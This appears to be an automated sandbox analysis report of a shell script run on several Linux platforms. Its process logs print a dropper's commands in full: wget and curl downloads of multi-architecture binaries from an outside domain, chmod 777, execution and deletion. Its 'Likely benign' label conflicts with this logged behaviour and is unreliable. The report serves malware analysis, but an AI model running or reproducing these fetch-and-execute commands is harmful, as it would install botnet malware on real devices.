Analysis Overview
SHA256
072a6dc8a7e9fb53b59013d0f1acd7e0f400e5ef77f264a7d4f85be4fde125c7
Threat Level: Likely benign
The file 69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.zip was found to be: Likely benign.
Malicious Activity Summary
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-15 19:21
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-15 19:21
Reported
2024-07-15 19:22
Platform
debian9-mipsel-20240418-en
Max time kernel
28s
Max time network
30s
Command Line
Signatures
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/busybox | /bin/cp | N/A |
Processes
/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]
/bin/cp
[cp /bin/busybox /tmp/]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]
/bin/chmod
[chmod 777 daddyl33tpiss.i486]
/tmp/daddyl33tpiss.i486
[./daddyl33tpiss.i486 Retard.i486.wget]
/bin/rm
[rm -rf daddyl33tpiss.i486]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.x86_64]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.x86_64]
/bin/chmod
[chmod 777 daddyl33tpiss.x86_64]
/tmp/daddyl33tpiss.x86_64
[./daddyl33tpiss.x86_64 Retard.x86_64.wget]
/bin/rm
[rm -rf daddyl33tpiss.x86_64]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i586]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i586]
/bin/chmod
[chmod 777 daddyl33tpiss.i586]
/tmp/daddyl33tpiss.i586
[./daddyl33tpiss.i586 Retard.i586.wget]
/bin/rm
[rm -rf daddyl33tpiss.i586]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i686]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i686]
/bin/chmod
[chmod 777 daddyl33tpiss.i686]
/tmp/daddyl33tpiss.i686
[./daddyl33tpiss.i686 Retard.i686.wget]
/bin/rm
[rm -rf daddyl33tpiss.i686]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mips]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mips]
/bin/chmod
[chmod 777 daddyl33tpiss.mips]
/tmp/daddyl33tpiss.mips
[./daddyl33tpiss.mips Retard.mips.wget]
/bin/rm
[rm -rf daddyl33tpiss.mips]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mipsel]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mipsel]
/bin/chmod
[chmod 777 daddyl33tpiss.mipsel]
/tmp/daddyl33tpiss.mipsel
[./daddyl33tpiss.mipsel Retard.mipsel.wget]
/bin/rm
[rm -rf daddyl33tpiss.mipsel]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm]
/bin/chmod
[chmod 777 daddyl33tpiss.arm]
/tmp/daddyl33tpiss.arm
[./daddyl33tpiss.arm Retard.arm.wget]
/bin/rm
[rm -rf daddyl33tpiss.arm]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm5]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm5]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
Files
/tmp/busybox
| MD5 | 6ffc46165b5d9726a6607f3ea5305589 |
| SHA1 | ab127220f42e816b413dde0d17031e251a7bc98f |
| SHA256 | 80d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c |
| SHA512 | 456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-15 19:21
Reported
2024-07-15 19:21
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
10s
Max time network
13s
Command Line
Signatures
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/busybox | /bin/cp | N/A |
Processes
/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]
/bin/cp
[cp /bin/busybox /tmp/]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 195.181.164.15:443 | tcp |
Files
/tmp/busybox
| MD5 | b4dede5fc0b1bad5cb8e901bde126b97 |
| SHA1 | 10cbe9a418ad84a1ed297948539d37aeb58dd810 |
| SHA256 | a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020 |
| SHA512 | 45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-15 19:21
Reported
2024-07-15 19:21
Platform
debian9-armhf-20240418-en
Max time kernel
18s
Max time network
3s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/busybox | /bin/cp | N/A |
Processes
/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]
/bin/cp
[cp /bin/busybox /tmp/]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
Files
/tmp/busybox
| MD5 | e588bcf03ae78237b58899d35f50c570 |
| SHA1 | 2194732ebbefbc27bdae876c77f2a97a20175710 |
| SHA256 | 2dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88 |
| SHA512 | 904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-15 19:21
Reported
2024-07-15 19:22
Platform
debian9-mipsbe-20240611-en
Max time kernel
24s
Max time network
26s
Command Line
Signatures
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/busybox | /bin/cp | N/A |
Processes
/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]
/bin/cp
[cp /bin/busybox /tmp/]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]
/bin/chmod
[chmod 777 daddyl33tpiss.i486]
/tmp/daddyl33tpiss.i486
[./daddyl33tpiss.i486 Retard.i486.wget]
/bin/rm
[rm -rf daddyl33tpiss.i486]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.x86_64]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.x86_64]
/bin/chmod
[chmod 777 daddyl33tpiss.x86_64]
/tmp/daddyl33tpiss.x86_64
[./daddyl33tpiss.x86_64 Retard.x86_64.wget]
/bin/rm
[rm -rf daddyl33tpiss.x86_64]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i586]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i586]
/bin/chmod
[chmod 777 daddyl33tpiss.i586]
/tmp/daddyl33tpiss.i586
[./daddyl33tpiss.i586 Retard.i586.wget]
/bin/rm
[rm -rf daddyl33tpiss.i586]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i686]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i686]
/bin/chmod
[chmod 777 daddyl33tpiss.i686]
/tmp/daddyl33tpiss.i686
[./daddyl33tpiss.i686 Retard.i686.wget]
/bin/rm
[rm -rf daddyl33tpiss.i686]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mips]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mips]
/bin/chmod
[chmod 777 daddyl33tpiss.mips]
/tmp/daddyl33tpiss.mips
[./daddyl33tpiss.mips Retard.mips.wget]
/bin/rm
[rm -rf daddyl33tpiss.mips]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mipsel]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
Files
/tmp/busybox
| MD5 | a39fe8036e559ce804e26518061e59ff |
| SHA1 | 8df27f6e8a48b762d945ea2f2b87390c80acd4de |
| SHA256 | 3180df117342646dcdc4c436f95b41e15587e2238ec59064b4b06c065d56cf38 |
| SHA512 | e97756f316fceef7360e789362648529eea50eb6f7cc56cf654b3fc43ca61f0e4d9f366ed8fd59b73dd5a49615e935e9f53686d15f9a83c7fa472a70e7196d0d |